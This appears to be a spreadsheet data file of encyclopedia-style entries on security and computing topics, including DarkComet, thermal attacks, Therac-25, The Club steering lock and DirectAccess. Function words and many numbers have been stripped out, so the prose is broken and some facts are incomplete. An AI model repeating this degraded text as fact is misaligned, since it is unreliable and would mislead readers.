trojan[backdoor]/win32.darkkomet.xyk bds/darkkomet.gs backdoor.win32.darkkomet!o rat.darkcometwhen computer infected, tries create connection socket controllers computer. once connection established infected computer listens commands controller, controller sends command, infected computer receives executes whatever function sent. references external links official website (now defunct)</t>
  </si>
  <si>
    <t>Thermal attack</t>
  </si>
  <si>
    <t>thermal attack (aka thermal imaging attack) approach exploits heat traces uncover entered credentials. these attacks rely phenomenon heat transfer object another. during authentication, heat transfers users' hands surface interacting with, leaving heat traces behind analyzed using thermal cameras operate far-infrared spectrum. these traces recovered used reconstruct passwords. cases, attack successful even seconds user authenticated.thermal attacks performed victim authenticated, alleviating need in-situ observation attacks (e.g., shoulder surfing attacks) affected hand occlusions. while smudge attacks reveal order entries graphical passwords, android lock patterns, thermal attacks reveal order entries even case pins alphanumeric passwords. reason thermal attacks leak information order entry keys buttons user touches first lose heat time, recently touched ones maintain heat signature longer time. this results distinguishable heat patterns tell attacker entry entered first. thermal attacks shown effective plastic keypads, ones used enter credit card's pins supermarkets restaurants, handheld mobile devices smartphones tablets.in paper published conference human factors computing systems (chi 2017), abdelrahman showed attack feasible today's smartphones. they also proposed ways mitigate attack, swiping randomly screen distort heat traces, forcing maximum usage seconds. references</t>
  </si>
  <si>
    <t>Deep content inspection</t>
  </si>
  <si>
    <t>deep content inspection (dci) form network filtering examines entire file mime object passes inspection point, searching viruses, spam, data loss, words content level criteria. deep content inspection considered evolution deep packet inspection ability look actual content contains instead focusing individual multiple packets. deep content inspection allows services keep track content across multiple packets signatures searching cross packet boundaries still found. exhaustive form network traffic inspection internet traffic examined across seven layers, importantly, application layer. background traditional inspection technologies unable keep recent outbreaks widespread attacks. unlike shallow inspection methods deep packet inspection (dpi), data part (and possibly also header) packet inspected, deep content inspection (dci)-based systems exhaustive, network traffic packets reassembled constituting objects, un-encoded and/or decompressed required, finally presented inspected malware, right-of-use, compliance, understanding traffic's intent. reconstruction comprehension done real-time, real-time policies applied traffic, preventing propagation malware, spam valuable data loss. further, dci, correlation comprehension digital objects transmitted many communication sessions leads ways network performance optimization intelligence regardless protocol blended communication sessions. historically, developed detect prevent intrusion. used provide quality service flow network traffic prioritized latency-sensitive traffic types (e.g., voice utilized provide higher flow priority. generation network content security devices unified threat management next generation firewalls (garner core research note g00174908) prevent attacks small percentage viruses worms; signatures malware within payload dpi's inspection scope. however, detection prevention generation malware conficker stuxnet possible exhaustive analysis provided dci. evolution systems computer networks send information across network point another; data (sometimes referred payload) ‘encapsulated’ within packet, looks follows: *the header provides address information sender destination addresses, tcp/udp header provided pertinent information port number, etc. networks evolve, inspection techniques evolve; attempting understand payload. throughout last decade vast improvements including: packet filtering historically, inspection technology examined header tcp/udp header. dubbed ‘packet filtering’, devices would drop sequence packets, packets allowed network. this scheme network traffic inspection first used firewalls protect packet attacks. stateful packet inspection stateful packet inspection developed examine header information packet content increase source destination understanding. instead letting packets result addresses ports, packets stayed network context appropriate networks’ current ‘state’. this scheme first used check point firewalls eventually intrusion prevention/detection systems. deep packet inspection deep packet inspection currently predominant inspection tool used analyze data packets passing network, including headers data protocol structures. these technologies scan packet streams look offending patterns. effective, deep packet inspection systems must ‘string’ match packet payloads malware signatures specification signatures (which dictate request/response like) wire speeds. fpgas, field programmable gate arrays, network processors, even graphics processing units (gpus) programmed hardwired signatures and, result, traffic passes circuitry quickly matched. while using hardware allows quick inline matches, systems following limitations including; hardware limitations: since systems implement pattern matching searches ‘offending’ patterns) hardware, systems typically limited number circuits high-end chip have; 2011, high system can, optimally, process around request/response session. memory available pattern matches; 2011, high-end systems capable matches 60,000 unique signaturespayload limitations: applications communicate content using binary-to-text encoding, compression (zipped, archived, etc.), obfuscation even encryption. payload structure becoming complex straight ‘string’ matching signatures longer sufficient. common workaround signatures similarly ‘encoded’ zipped which, given ‘search limitations’, cannot scale support every application type, nested zipped archived files. deep content inspection parallel development deep packet inspection, beginnings deep content inspection traced back early 1995 introduction proxies stopped malware spam. deep content inspection, seen third generation network content inspection, network content exhaustively examined, first generation secure gateway proxy-based network content inspection proxies deployed provide internet caching services retrieve objects forward them. consequently, network traffic intercepted, potentially stored. these graduated known secure gateways, proxy-based inspections retrieve scans object, script, images. proxies, relies fetch content first cached, forwarding content recipient introduced form file inspection early 1995 mailsweeper released content technologies (now clearswift), replaced mimesweeper 2005. 2006 release open-source, cross-platform antivirus software clamav provided support caching proxies, squid netcache. using internet content adaptation protocol (icap), proxy pass downloaded content scanning icap server running anti-virus software. since complete files ‘objects’ passed scanning, proxy-based anti-virus solutions considered first generation network content inspection. bluecoat, webwasher secure computing inc. (now mcafee, division intel), provided commercial implementations proxies, eventually becoming standard network element enterprise networks. limitations: while proxies secure gateways) provide in-depth network traffic inspection, limited they: require network reconfiguration accomplished end-devices browsers point proxies; network routers traffic routed devices limited (http) protocols; cannot scan protocols e-mail finally, proxy architectures typically built around squid, cannot scale concurrent sessions, limiting deployment enterprises. second generation gateway/firewall-based network traffic proxy-assisted deep packet inspection second generation network traffic inspection solutions implemented firewalls and/or utms. given network traffic choked devices, addition inspection, proxy-like inspection possible. this approach first pioneered netscreen technologies inc. (acquired juniper networks inc). however, given expensive cost operation, feature applied tandem system activated a-per-need basis, content failed qualified system. third generation transparent, application-aware network content inspection, deep content inspection third, current, generation network content inspection known deep content inspection solutions implemented fully transparent devices perform full application level content inspection wire speed. order understand communication session's intent entirety—, deep content inspection system must scan handshake payload. once digital objects (executables, images, javascript's, .pdfs, etc. also referred data-in-motion) carried within payload constructed, usability, compliance threat analysis session payload achieved. given handshake sequence complete payload session available system, unlike systems simple pattern matching reputation search possible, exhaustive object analysis possible. inspection provided systems include signature matching, behavioral analysis, regulatory compliance analysis, correlation session inspection history previous sessions. because availability complete payload's objects, schemes inspection, deep content inspection systems typically deployed high-grade security compliance required end-point security solutions possible bring device, cloud installations. this third generation approach deep content inspection developed within defence intelligence community, first appearing guard products sybard, later wedge networks inc.. key-implementation highlights company's approach deduced patent uspto# 7,630,379the main differentiators deep content inspection are: content deep content inspection content-focused instead analyzing packets classifying traffic based application types next generation firewalls. "understanding" content intent highest level intelligence gained network traffic. this important information flow moving away packet, towards application, ultimately content. example inspection levels: packet: random sample larger picture application: group application profiling. certain applications, areas applications, allowed allowed scanned further. content: look everything. scan everything. subject content rules inspection (such compliance/data loss prevention rules). understand intent. multi-services inspection because availability complete objects payload deep content inspection system, services/inspection examples include: anti malware anti-spam data loss data motion zero-day unknown threats network traffic vizualization analytics code attacks/injection content manipulation applications deep content inspection currently adopted enterprises, service providers governments reaction increasingly complex internet traffic benefits understanding complete file types intent. typically, organizations mission-critical applications rigid requirements. obstacles deep content inspection network throughput this type inspection deals real time protocols continue increase complexity size. barriers providing level inspection, looking content, dealing network throughput. solutions must overcome issue introducing latency network environment. they must also able effectively scale meet tomorrow's demands demands envisioned growing cloud computing trend. approach selective scanning; however, avoid compromising accuracy, selection criteria based recurrence. following patent uspto# 7,630,379 provides scheme deep content inspection carried effectively using recurrence selection scheme. novelty introduced patent addresses issues content (e.g., file) could renamed transmission. accuracy services dealing amount traffic information applying services requires high speed look able effective. need compare full services platforms else traffic utilized effectively. example often found dealing viruses malicious content solutions compare content small virus database instead full complete one. also content threat removal content disarm reconstruction references</t>
  </si>
  <si>
    <t>Therac-25</t>
  </si>
  <si>
    <t>therac-25 computer-controlled radiation therapy machine produced atomic energy canada limited (aecl) 1982 therac-6 therac-20 units (the earlier units produced partnership compagnie générale radiographique (cgr) france). involved least accidents 1985 1987, patients given massive overdoses radiation.: because concurrent programming errors (also known race conditions), sometimes gave patients radiation doses hundreds times greater normal, resulting death serious injury. these accidents highlighted dangers software control safety-critical systems, become standard case study health informatics, software engineering, computer ethics. additionally, overconfidence engineers: lack proper diligence resolve reported software bugs highlighted extreme case engineers' overconfidence initial work failure believe users' claims caused drastic repercussions. design machine three modes operation, turntable moving apparatus position modes: either light, scan magnets, tungsten target flattener. "field light" mode, allowed patient collimator correctly positioned illuminating treatment area visible light. direct electron-beam therapy, narrow, low-current beam high-energy (0.80 4.01 pj)) electrons scanned treatment area magnets; megavolt x-ray photon) therapy, delivered beam x-ray photons. x-ray photons produced colliding high current, narrow beam electrons tungsten target. x-rays passed flattening filter, measured using x-ray chamber. flattening filter resembles inverted ice-cream cone, shapes attenuates x-rays. electron beam current required produce x-rays times greater used electron therapy. problem description documented accidents occurred high-current electron beam generated x-ray mode delivered directly patients. software faults blame. one, operator incorrectly selected x-ray mode quickly changing electron mode, allowed electron beam x-ray mode without x-ray target place. second fault allowed electron beam activate field-light mode, beam scanner active target place. previous models hardware interlocks prevent faults, therac-25 removed them, depending instead software checks safety. high-current electron beam struck patients approximately times intended dose radiation, narrower area, delivering potentially lethal dose beta radiation. feeling described patient intense electric shock", causing scream treatment room. several days later, radiation burns appeared, patients showed symptoms radiation poisoning; three cases, injured patients later died result overdose. root causes commission attributed primary cause general poor software design development practices rather single-out specific coding errors. particular, software designed realistically impossible test rigorous, automated way.: researchers investigated accidents found several contributing causes. these included following institutional causes: aecl software code independently reviewed chose rely in-house code, including operating system. aecl consider design software assessment machine might produce desired results failure modes existed, focusing purely hardware asserting software free bugs. machine operators reassured aecl personnel overdoses impossible, leading dismiss therac-25 potential cause many incidents.: aecl never tested therac-25 combination software hardware assembled hospital.the researchers also found several engineering issues: several error messages merely displayed word "malfunction" followed number user manual explain even address error codes, give indication errors could pose threat patient safety. system distinguished errors halted machine, requiring restart, errors merely paused machine (which allowed operators continue settings using keypress). however, errors endangered patient merely paused machine, frequent occurrence minor errors caused operators become accustomed habitually unpausing machine. failure occurred particular sequence keystrokes entered vt-100 terminal controlled pdp-11 computer: operator press (erroneously) select photon mode, "cursor edit input (correctly) select electron mode, "enter", within eight seconds first keypress, well within capability experienced user machine. these edits noticed would take seconds startup, would default setup. design hardware interlocks prevent electron-beam operating high-energy mode without target place. engineer reused software therac-6 therac-20, used hardware interlocks masked software defects. those hardware safeties reporting triggered, preexisting errors overlooked. hardware provided software verify sensors working correctly. table-position system first implicated therac-25's failures; manufacturer revised redundant switches cross-check operation. software flag variable incrementing rather setting fixed non-zero value. occasionally arithmetic overflow occurred, causing flag return zero software bypass safety checks.leveson notes lesson drawn incident assume reused software safe: naive assumption often made reusing software using commercial off-the-shelf software increase safety software exercised extensively. reusing software modules guarantee safety system transferred..." response incidents like associated therac-25, 62304 standard created, introduces development life cycle standards medical device software specific guidance using software unknown pedigree. also 62304 computer ethics high integrity software ionizing radiation list civilian radiation accidents nuclear radiation accidents radiation protection further reading gallagher, troy. therac-25: computerized radiation therapy. archived original 2007-12-12. (short summary therac-25 accidents) references</t>
  </si>
  <si>
    <t>Digital Forensics Framework</t>
  </si>
  <si>
    <t>digital forensics framework (dff) computer forensics open-source software. used professionals non-experts collect, preserve reveal digital evidence without compromising systems data. user interfaces digital forensics framework offers graphical user interface (gui) developed pyqt classical tree view. features recursive view, tagging, live search bookmarking available. command line interface allows user remotely perform digital investigation. comes common shell functions completion, task management, globing keyboard shortcuts. batch scripts startup automate repetitive tasks. advanced users developers directly python interpreter script investigation. distribution methods addition source code package binary installers linux windows, digital forensics framework available operating system distributions typical free open-source software (foss), including debian, fedora ubuntu. other digital forensics framework methods available digital forensics oriented distribution live deft linux live kali linux publications "scriptez analyses forensiques avec python dff" french magazine misc several presentations conferences: "digital forensics framework" esgi security introduction digital forensics" rmll 2013published books mention digital forensics framework are: digital forensics open source tools (syngress, 2011) computer forensik hacks (o'reilly, 2012) malwares identification, analyse éradication (epsilon, 2013) digital forensics handheld devices (crc press inc, 2012) literature saving rain: first novel rain trilogy white papers selective imaging revisited survey main memory acquisition analysis techniques windows operating system uforia universal forensic indexer analyzer visualizing indicators rootkit infections memory forensics em-dmkm case study computer network forensics ov-chipcard extension l'investigation numérique libre malware analysis method based reverse technology 口序分析方法 prize used solve 2010 digital forensic research workshop (dfrws) challenge consisting reconstructing physical dump nand flash memory. references external links official website</t>
  </si>
  <si>
    <t>The Coroner's Toolkit</t>
  </si>
  <si>
    <t>coroner's toolkit tct) suite free computer security programs farmer wietse venema digital forensic analysis. suite runs several unix-related operating systems: freebsd, openbsd, bsd/os, sunos/solaris, linux, hp-ux. released terms public license. parts used analysis data recovery computer disasters. superseded sleuth kit. although partially based tct, authors accepted official successor tct. references external links official home page feature: coroner's toolkit frequently asked questions coroner's toolkit</t>
  </si>
  <si>
    <t>The Code Room</t>
  </si>
  <si>
    <t>code room half-hour-long reality game show produced microsoft. show conceptualized executive produced paul murphy hosted jessi knapp, accompanied varying project expert. each episode consists number msdn developer event attendees team complete project, given specifications, limited amount time. confused code room group introduced world "hybrid hostel". code room filmed msdn developer event shown several cable television stations, well streaming television stations like msdn show could also watched free channel community, additionally included several msdn dvds. "code room" typically enclosed room desks, whiteboards computers. required programming tools installed, along stationery. however, internet connection available contestants could bring notes. contestants preselected development environments typically them, given quick crash course environment presentation contest began. teams able complete project within required time eligible prizes part "team code ff". series, "team code teams (determined performance, well community ranking) competed final code room challenge ultimate "code room champion" title. program telly award 2004. episodes code room: episode published december 2004 code room: episode building mobile apps bluetooth enabled kiosks, published 2005 code room: episode breaking into vegas, published february 2006 also microsoft developer network .net show external links (official website) msdn events msdn msdn telly awards</t>
  </si>
  <si>
    <t>The Club (automotive)</t>
  </si>
  <si>
    <t>club trademark version popular automotive steering-wheel lock, produced sharon, pennsylvania-based winner international. company formed 1986 purpose marketing device. inventor, james winner jr., derived idea device service korean war, fellow soldiers instructed secure steering wheels vehicles metal chains. design device consists pieces which, locked together, form long, fixed protruding hooks opening towards ends bar. each piece hook, intended around steering wheel. smaller pieces fits inside larger piece slides sizing. when lock set, larger piece's long handle protrudes out, wheel practically impossible turn collision parts driver's legs, device cannot removed large slip around wheel. remove device, user unlocks central bar, slides pieces together hooks longer surround wheel; allows slip out, freeing wheel. weaknesses club originally designed prone lock shattered freezing freon; later models addressed issue changing chromium/molybdenum alloy. television broadcast test showed form attack took several minutes hammering. grievous flaw design inherent modern construction steering wheels; thieves defeat type lock making steering wheel's outer rim, allowing device removed. this does, however, require access hacksaw cutting tool, ruins steering wheel. however, club removed, used assist thief breaking steering lock built steering column; thieves target cars "protected" club cars reason. additional device called "the cap" made added metal cover steering wheel; also defeated replacing entire steering wheel similar one. newer variation made pair hooks club instead one, thereby requiring cuts hacksaw remove, thereby twice time remove. 2000, device called "club buster" designed locksmiths. screw hook large handle legs designed rest lock. breaks steering wheel locks club hooking onto lock tightening screw handle. large handle provides mechanical advantage, concentrating force applied hook eventually forcing lock fold half snap two. notes</t>
  </si>
  <si>
    <t>Digital watermarking</t>
  </si>
  <si>
    <t>digital watermark kind marker covertly embedded noise-tolerant signal audio, video image data. typically used identify ownership copyright signal. "watermarking" process hiding digital information carrier signal; hidden information should, need contain relation carrier signal. digital watermarks used verify authenticity integrity carrier signal show identity owners. prominently used tracing copyright infringements banknote authentication. like traditional physical watermarks, digital watermarks often perceptible certain conditions, e.g. using algorithm. digital watermark distorts carrier signal becomes easily perceivable, considered less effective depending purpose. traditional watermarks applied visible media (like images video), whereas digital watermarking, signal audio, pictures, video, texts models. signal carry several different watermarks time. unlike metadata added carrier signal, digital watermark change size carrier signal. needed properties digital watermark depend case applied. marking media files copyright information, digital watermark rather robust modifications applied carrier signal. instead, integrity ensured, fragile watermark would applied. both steganography digital watermarking employ steganographic techniques embed data covertly noisy signals. while steganography aims imperceptibility human senses, digital watermarking tries control robustness priority. since digital copy data original, digital watermarking passive protection tool. marks data, degrade control access data. application digital watermarking source tracking. watermark embedded digital signal point distribution. copy work found later, watermark retrieved copy source distribution known. this technique reportedly used detect source illegally copied movies. history term "digital watermark" coined andrew tirkel charles osborne december 1992. first successful embedding extraction steganographic spread spectrum watermark demonstrated 1993 andrew tirkel, charles osborne gerard rankin.watermarks identification marks produced paper making process. first watermarks appeared italy 13th century, rapidly spread across europe. they used means identify paper maker trade guild manufactured paper. marks often created wire sewn onto paper mold. watermarks continue used today manufacturer's marks prevent forgery. applications digital watermarking used wide range applications, copyright protection source tracking (different recipients differently watermarked content) broadcast monitoring (television news often contains watermarked video international agencies) video authentication software crippling screencasting video editing software programs, encourage users purchase full version remove card security fraud tamper detection. content management social networks digital watermarking life-cycle phases information embedded signal called digital watermark, although contexts phrase digital watermark means difference watermarked signal cover signal. signal watermark embedded called host signal. watermarking system usually divided three distinct steps, embedding, attack, detection. embedding, algorithm accepts host data embedded, produces watermarked signal. then watermarked digital signal transmitted stored, usually transmitted another person. person makes modification, called attack. while modification malicious, term attack arises copyright protection application, third parties attempt remove digital watermark modification. there many possible modifications, example, lossy compression data resolution diminished), cropping image video, intentionally adding noise. detection (often called extraction) algorithm applied attacked signal attempt extract watermark signal unmodified transmission, watermark still present extracted. robust digital watermarking applications, extraction algorithm able produce watermark correctly, even modifications strong. fragile digital watermarking, extraction algorithm fail change made signal. classification digital watermark called robust respect transformations embedded information detected reliably marked signal, even degraded number transformations. typical image degradations jpeg compression, rotation, cropping, additive noise, quantization. video content, temporal modifications mpeg compression often added list. digital watermark called imperceptible watermarked content perceptually equivalent original, unwatermarked content. general, easy create either robust watermarks—or—imperceptible watermarks, creation robust—and—imperceptible watermarks proven quite challenging. robust imperceptible watermarks proposed tool protection digital content, example embedded no-copy-allowed flag professional video content.digital watermarking techniques classified several ways. robustness digital watermark called "fragile" fails detectable slightest modification. fragile watermarks commonly used tamper detection (integrity proof). modifications original work clearly noticeable, commonly referred watermarks, generalized barcodes. digital watermark called semi-fragile resists benign transformations, fails detection malignant transformations. semi-fragile watermarks commonly used detect malignant transformations. digital watermark called robust resists designated class transformations. robust watermarks used copy protection applications carry copy access control information. perceptibility digital watermark called imperceptible original cover signal marked signal perceptually indistinguishable. digital watermark called perceptible presence marked signal noticeable (e.g. digital on-screen graphics like network logo, content bug, codes, opaque images). videos images, made transparent/translucent convenience consumers fact block portion view; therefore degrading this confused perceptual, watermarking uses limitations human perception imperceptible. capacity length embedded message determines different main classes digital watermarking schemes: message conceptually zero-bit long system designed order detect presence absence watermark marked object. this kind watermarking scheme usually referred zero-bit presence watermarking schemes. message n-bit-long stream {\displaystyle \left(m=m_{1}\ldots m_{n},\;n\in \mathbb \right.} {\displaystyle \left.n=|m|\right)} {\displaystyle m=\{0,1\}^{n}} modulated watermark. these kinds schemes usually referred multiple-bit watermarking non-zero-bit watermarking schemes. embedding method digital watermarking method referred spread-spectrum marked signal obtained additive modification. spread-spectrum watermarks known modestly robust, also information capacity host interference. digital watermarking method said quantization type marked signal obtained quantization. quantization watermarks suffer robustness, high information capacity rejection host interference. digital watermarking method referred amplitude modulation marked signal embedded additive modification similar spread spectrum method, particularly embedded spatial domain. evaluation benchmarking evaluation digital watermarking schemes provide detailed information watermark designer end-users, therefore, different evaluation strategies exist. often used watermark designer evaluation single properties show, example, improvement. mostly, end-users interested detailed information. they want know given digital watermarking algorithm used application scenario, parameter sets seems best. cameras epson kodak produced cameras security features epson photopc 3000z kodak dc-290. both cameras added irremovable features pictures distorted original image, making unacceptable applications forensic evidence court. according blythe fridrich, "[n]either camera provide undisputable proof image origin author". secure digital camera (sdc) proposed saraju mohanty, 2003 published january 2004. this first time proposed. blythe fridrich also worked 2004 digital camera would lossless watermarking embed biometric identifier together cryptographic hash. reversible data hiding reversible data hiding technique enables images authenticated restored original form removing digital watermark replacing image data overwritten. this would make images acceptable legal purposes. army also interested technique authentication reconnaissance images. watermarking relational databases digital watermarking relational databases emerged candidate solution provide copyright protection, tamper detection, traitor tracing, maintaining integrity relational data. many watermarking techniques proposed literature address purposes. survey current state-of-the-art classification different techniques according intent, express watermark, cover type, granularity level, verifiability published 2010 halder journal universal computer science. also coded anti-piracy copy attack eurion constellation pattern recognition (novel) steganography traitor tracing watermark (data file) audio watermark digital on-screen graphic automatic content recognition references further reading ecrypt report: audio benchmarking tools steganalysis ecrypt report: watermarking benchmarking jana dittmann, david megias, andreas lang, jordi herrera-joancomarti; theoretical framework practical evaluation comparison audio watermarking schemes triangle robustness, transparency capacity; transaction data hiding multimedia security springer lncs 4300; editor shi; 1–40; isbn 978-3-540-49071-5,2006 smirnov, june 2005). "holographic approach embedding hidden watermarks photographic image". journal optical technology. (6): 464–484. bibcode:2005joptt..72..464s. doi:10.1364/jot.72.000464. issn 1070-9762. patrick bas, teddy furon, françois cayre, gwenaël doërr, benjamin mathon, "watermarking security, fundamentals, secure designs attacks", springer briefs electrical computer engineering, 2016, isbn 978-9811005053 external links batch watermark digital watermarking alliance digital watermarking data hiding research papers forensics.nl information hiding homepage fabien petitcolas robust mesh watermarking photowatermark technology: holographic approach watermarking lecture</t>
  </si>
  <si>
    <t>Terminal verification results</t>
  </si>
  <si>
    <t>terminal verification results (tvr) '95' data object series bits terminal reading card, based logical tests (for example card expired). this data object used terminal's decision whether accept, decline on-line payment transaction. format follows: also references specification bulletins specification external links online decoder</t>
  </si>
  <si>
    <t>Direct Access Archive</t>
  </si>
  <si>
    <t>direct access archive, daa, proprietary file format developed poweriso computing disk image files. format supports features compression, password protection, splitting multiple volumes. popular windows disk image mounting programs alcohol 120% daemon tools currently support mounting images; linux also support mounting images kind. currently published information format. among mainstream applications, opened converted magiciso ultraiso. various free open-source packages also available convert images. file structure although lacking official documentation, image files zlib- lzma-compressed images chunk chunk. conversion poweriso provides free command-line tools linux allow user extract files convert format, however tools updated support newest version format. poweriso windows trial version supports converting images files 300mb, less half capacity standard acetoneiso free cd/dvd management application linux convert help external poweriso command-line tool linux. daa2iso open source command line application developed convert files files. program comes windows binary source code compiles unix-like operating systems. daa2iso allows users select .daa file, location .iso output standard windows open save dialogs converter application wraps daa2iso command-line tool (gnu license). features using freely available compression algorithms, includes following features absent (but obtained manually compressing files): ability compress images, thus saving space allowing smaller downloads password protected split multiple smaller files references external links poweriso website</t>
  </si>
  <si>
    <t>Teradici</t>
  </si>
  <si>
    <t>teradici corporation privately held software company founded 2004, acquired inc. october 2021. teradici initially developed protocol (pcoip) compressing decompressing images sound remotely accessing blade servers, implemented hardware. this technology later expanded thin clients/zero clients general virtual desktop infrastructure. teradici's protocol hardware used dell-wyse, amulet hotkey, samsung, amazon services, fujitsu, vmware. july, 2021, announced signed definitive agreement acquire teradici undisclosed terms, deal close calendar 2021. history teradici founded 2004 cordingley, dave hobbs, unger maher fahmi. operated stealth mode 2007 announced first products, blade server card small hockey puck shaped client, using proprietary chip implemented pcoip protocol. 2008, vmware announced licensing teradici's pcoip protocol. teradici developed software implementation pcoip, vmware started shipping vmware view 4.the teradici name originated previous company founders incubating. that company's product involved 100-gigabit datacenter networking device. one-tenth tera deci, "teradeci" roll tongue. "teradici" unique, sounded better domain name available time. pcoip protocol pc-over-ip (pcoip) proprietary remote display protocol developed teradici. protocol available hardware software. 2008, vmware licensed teradici's pcoip protocol, supports vmware horizon view. 2013 amazon licensed pcoip protocol amazon workspaces.pcoip udp-based protocol host rendered, multi-codec dynamically adaptive. images rendered server captured pixels, compressed encoded sent client decryption decompression. depending image, different codecs used encode pixels sent since techniques compress video images differ effectiveness compared text. protocol also dynamically adapts encoding based available bandwidth. low-bandwidth environments uses lossy compression highly compressed image quickly delivered, followed additional data refine image, process termed "build perceptually lossless". default lossless compression used minimal network congestion explicitly configured, might required scenarios image fidelity important conserving bandwidth, e.g. medical imaging. comparing pcoip using pcoip vpn: pcoip protocols used place company’s virtual private network, corporate firewall available deactivated. high security encryption level connections: using corporate dmz, users make secure encrypted connections access points servers either pcoip rdp. security aes: both pcoip support advanced encryption standard 128-bit default, adding extra layer security connections. although, change encryption cipher aes-256 pcoip. bandwidth reduction: this capability available pcoip protocol order optimize bandwidth usage increase speed. bandwidth evaluated remote desktop commander track number depends setting (color, depth, etc.). products solutions products pcoip zero client (system chip): socs oems implement zero clients either teradici-developed tera1 tera2 chip, implement pcoip protocol. pcoip workstation host (system chip): allowing implement pcie card plugs workstation (typically blade computer), allowing remoted controlled client device, either pcoip zero client pcoip software client. connection 1:1, meaning host system remote user; virtualized shared capture output full remoting along redirecting audio peripherals. pcoip software clients: software implementation pcoip protocol flexible client device support. select oems include products arm-based thin clients. this also basis vmware amazon workspaces software clients windows, mac, linux, android teradici-developed core pcoip protocol decoding technology. direct products teradici apex 2800 server offload card: pcie coprocessor hardware accelerator board vmware horizon offloading compression encryption graphics audio horizon software client pcoip zero client improving server consolidation environment. pcoip management console: web-based management tool administrative control pcoip zero client devices central console. workstation access software: enables remote access pcoip software client pcoip zero client physical windows virtual machine cloud. host card. also comparison platform virtualization software desktop virtualization virtualization virtual machine virtual appliance thin client comparison remote desktop software references</t>
  </si>
  <si>
    <t>DirectAccess</t>
  </si>
  <si>
    <t>directaccess, also known unified remote access, technology provides intranet connectivity client computers connected internet. unlike many traditional connections, must initiated terminated explicit user action, directaccess connections designed connect automatically soon computer connects internet. directaccess introduced windows server 2008 providing service windows windows "enterprise" edition clients. 2010, microsoft forefront unified access gateway (uag) released, simplifies deployment directaccess windows 2008 includes additional components make easier integrate without need deploy ipv6 network, dedicated user interface configuration monitoring. some requirements limitations part design directaccess windows server 2008 changed (see requirements below). while directaccess based microsoft technology, third-party solutions exist accessing internal unix linux servers directaccess. with windows server 2012, directaccess fully integrated operating system, providing user interface configure native ipv6 ipv4 support. technology directaccess establishes ipsec tunnels client directaccess server, uses ipv6 reach intranet resources directaccess clients. this technology encapsulates ipv6 traffic ipv4 able reach intranet internet, still (mostly) relies ipv4 traffic. traffic intranet encrypted using ipsec encapsulated ipv4 packets native ipv6 connection cannot established), means cases, configuration firewalls proxies required. directaccess client several tunneling technologies, depending configuration network client connected client 6to4, teredo tunneling, ip-https, provided server configured correctly able them. example, client connected internet directly 6to4, inside nated network, teredo instead. addition, windows server 2012 provides backward compatibility services dns64 nat64, allows directaccess clients communicate servers inside corporate network even servers capable ipv4 networking. globally routable nature ipv6, computers corporate network also initiate connection directaccess clients, allows remotely manage (manage out) clients time. benefits directaccess deployed multiple sites. allows secure encrypted vpn. this controlled group policies allows administrator maintain secure network. requirements directaccess with windows server 2008 requires: directaccess servers running windows server 2008 network adapters: connected directly internet, second connected intranet. directaccess server, least consecutive, public ipv4 addresses assigned network adapter connected internet. directaccess clients running windows "ultimate" "enterprise" editions windows "enterprise" edition clients least domain controller domain name system (dns) server running windows server 2008 windows server 2008 public infrastructure (pki) issue computer certificates.directaccess with windows server 2012 requires: directaccess servers running windows server 2012 network adapters. least domain controller domain name system (dns) server running windows server 2008 windows server 2008 directaccess clients running windows "ultimate" "enterprise" editions windows "enterprise" edition clients public infrastructure required windows clients.smart card certificates, health certificates network access protection used along pki. references external links microsoft's directaccess windows server 2012 microsoft's directaccess windows server 2008 ms-iphttps msdn: includes specification. blogger's posting directaccess richard hicks' directaccess blog differences native 2008 directaccess</t>
  </si>
  <si>
    <t>Directory Services Restore Mode</t>
  </si>
  <si>
    <t>directory services restore mode (dsrm) function active directory domain controllers take server offline emergency maintenance, particularly restoring backups objects. accessed windows server advanced startup menu, similarly safe mode. password windows 2000, dsrm password typically created null value (blank), also recovery console password. starting windows server 2003, dsrm password must defined domain controller promoted. anyone password access domain controller reboot machine, copy modify active directory database, reboot server without leaving trace activity. dsrm password changes cannot scripted, accomplished manually command line; dsrm passwords also automatically changed audited using privileged identity management software. alternatives windows server 2008 "active directory recycle bin" added, allows on-line restoration accidentally-deleted objects. functionality reminiscent windows' recycle function. also list microsoft windows components references external links securing dsrm password restart domain controller directory services restore mode locally</t>
  </si>
  <si>
    <t>Differential-linear attack</t>
  </si>
  <si>
    <t>introduced martin hellman susan langford 1994, differential-linear attack linear cryptanalysis differential cryptanalysis. attack utilises differential characteristic part cipher probability (for rounds—this probability would much lower whole cipher). rounds immediately following differential characteristic linear approximation defined, expect chosen plaintext pair, probability linear approximation holding chosen plaintext lower correct key. hellman langford shown attack recover bits 8-round chosen plaintexts chance success. attack generalised biham differential characteristics probability less besides des, applied feal, idea, serpent, camellia, even stream cipher phelix. references johan borst (february 1997). "differential-linear cryptanalysis idea". citeseerx 10.1.1.49.5084. {{cite journal}}: cite journal requires |journal= (help) johan borst, lars knudsen, vincent rijmen (may 1997). attacks reduced idea (pdf). advances cryptology eurocrypt '97. konstanz: springer-verlag. 1–13. retrieved 2007-03-08.{{cite conference}}: maint: multiple names: authors list (link) biham; dunkelman; nathan keller (december 2002). enhancing differential-linear cryptanalysis (pdf/gzipped postscript). advances cryptology, proceeding asiacrypt 2002, lecture notes computer science 2501. queenstown, zealand: springer-verlag. 254–266. retrieved 2006-12-07. biham, dunkelman, nathan keller (february 2003). differential-linear cryptanalysis serpent (pdf/postscript). 10th international workshop fast software encryption (fse '03). lund: springer-verlag. 9–21. retrieved 2007-03-08.{{cite conference}}: maint: multiple names: authors list (link) hongjun bart preneel (december 2006). differential-linear attacks stream cipher phelix (pdf). 14th international workshop fast software encryption (fse '07). luxembourg city: springer-verlag. retrieved 2007-03-08. biham, dunkelman, nathan keller (december 2006). attack 6-round idea. 14th international workshop fast software encryption (fse '07). luxembourg city: springer-verlag.{{cite conference}}: maint: multiple names: authors list (link)</t>
  </si>
  <si>
    <t>Tera Term</t>
  </si>
  <si>
